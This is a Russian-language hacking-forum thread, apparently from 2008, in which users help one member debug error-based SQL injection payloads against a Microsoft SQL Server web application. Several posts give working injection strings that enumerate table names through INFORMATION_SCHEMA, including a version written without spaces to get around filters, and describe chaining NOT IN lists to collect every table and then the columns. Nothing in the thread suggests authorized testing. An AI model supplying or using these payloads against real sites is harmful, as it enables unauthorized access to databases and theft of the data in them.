HOME FORUMS MEMBERS RECENT POSTS LOG IN  
× Авторизация
Имя пользователя:
Пароль:
Нет аккаунта? Регистрация
Баннер 1   Баннер 2
НОВЫЕ ТОРГОВАЯ НОВОСТИ ЧАТ
loading...
Скрыть
Вернуться   ANTICHAT > БЕЗОПАСНОСТЬ И УЯЗВИМОСТИ > Уязвимости
Перезагрузить страницу mssql inj help
   
Ответ
Страница 1 из 7 1 2 3 4 5 > Последняя »
 
Опции темы Поиск в этой теме Опции просмотра

mssql inj help
  #1  
Старый 22.03.2008, 13:58
-=megahertz=-
Участник форума
Регистрация: 23.05.2007
Сообщений: 103
С нами: 9984161

Репутация: 56
По умолчанию mssql inj help
При таком запросе
"1+or+1=(SELECT+1+TOP+TABLE_NAME+FROM+INFORMATION_ SCHEMA.TABLES)--"
показывает
Incorrect syntax near the keyword 'TOP'

в чем моя ошибка?
𝕏 Twitter Reddit Telegram Копировать ссылку
 
Ответить с цитированием

  #2  
Старый 22.03.2008, 14:10
~X3RiX~
Banned
Регистрация: 14.03.2008
Сообщений: 36
С нами: 9557606

Репутация: 9
По умолчанию
юзай

http://pentestmonkey.net/blog/mssql-sql-injection-cheat-sheet/
 
Ответить с цитированием

  #3  
Старый 22.03.2008, 14:12
guest3297
Banned
Регистрация: 27.06.2006
Сообщений: 1,614
С нами: 10459106

Репутация: 2996


По умолчанию
"1+or+1=(SELECT+1+max(TABLE_NAME)+FROM+INFORMATION _SCHEMA.TABLES)--"
 
Ответить с цитированием

  #4  
Старый 22.03.2008, 15:08
Scipio
Members of Antichat - Level 5
Регистрация: 02.11.2006
Сообщений: 781
С нами: 10274726

Репутация: 1917


По умолчанию
можно проинжектить запрос вобще без использования пробелов:
or(1=(select(max(table_name))from[information_schema].tables))

[ cash ]
__________________
Карфаген должен быть разрушен...
 
Ответить с цитированием

  #5  
Старый 22.03.2008, 15:31
-=megahertz=-
Участник форума
Регистрация: 23.05.2007
Сообщений: 103
С нами: 9984161

Репутация: 56
По умолчанию
спасиб онотолий, помогло
 
Ответить с цитированием

  #6  
Старый 22.03.2008, 16:24
-=megahertz=-
Участник форума
Регистрация: 23.05.2007
Сообщений: 103
С нами: 9984161

Репутация: 56
По умолчанию
снова я
1+or+1=((select((table_name))from[information_schema].tables+where+TABLE_NAME+NOT+IN+('syssegments')))--
выводит
'syssegments'
делаю так
1+or+1=((select((table_name))from[information_schema].tables+where+TABLE_NAME+NOT+IN+('syssegments','sy ssegments')))--
выводит
'syssegmentssyssegments'
в след запросе выводит уже
'syssegmentssyssegmentssyssegmentssyssegments'
и т.д.
 
Ответить с цитированием

  #7  
Старый 22.03.2008, 16:39
ReVOLVeR
Участник форума
Регистрация: 02.09.2006
Сообщений: 176
С нами: 10362626

Репутация: 327
По умолчанию
TABLE_NAME+NOT+IN+('syssegments','sy ssegments','syssegmentssyssegments'...итд)))--
таким образом узнаёш все таблицы))
патом также только для столбцов и формеруеш запрос к бд))
 
Ответить с цитированием

  #8  
Старый 22.03.2008, 16:42
-=megahertz=-
Участник форума
Регистрация: 23.05.2007
Сообщений: 103
С нами: 9984161

Репутация: 56
По умолчанию
я знаю что так надо
просто проблема в том что он просто делат так
syssegments
syssegmentssyssegments
syssegmentssyssegmentssyssegmentssyssegments
syssegmentssyssegmentssyssegmentssyssegmentssysseg mentssyssegments
...
так не должно быть
 
Ответить с цитированием

  #9  
Старый 22.03.2008, 16:42
Scipio
Members of Antichat - Level 5
Регистрация: 02.11.2006
Сообщений: 781
С нами: 10274726

Репутация: 1917


По умолчанию
-=megahertz=-, покажи полностью, результат выполнения запроса
__________________
Карфаген должен быть разрушен...
 
Ответить с цитированием

  #10  
Старый 22.03.2008, 16:47
ReVOLVeR
Участник форума
Регистрация: 02.09.2006
Сообщений: 176
С нами: 10362626

Репутация: 327
По умолчанию
разграничь при помощи ';'
 
Ответить с цитированием
Ответ
Страница 1 из 7 1 2 3 4 5 > Последняя »



« Предыдущая тема | Следующая тема »
Похожие темы
Тема Автор Раздел Ответов Последнее сообщение
Toolkit для работы с mysql inj от меня Piflit PHP 33 09.06.2010 22:03
Mssql уддаленный дамп delay(0) Уязвимости 12 08.07.2008 15:36
Чтение данных с MsSql constanta Уязвимости 5 25.02.2008 20:05



Здесь присутствуют: 1 (пользователей: 0 , гостей: 1)
 


Быстрый переход




ANTICHAT ™ © 2001- Antichat Kft.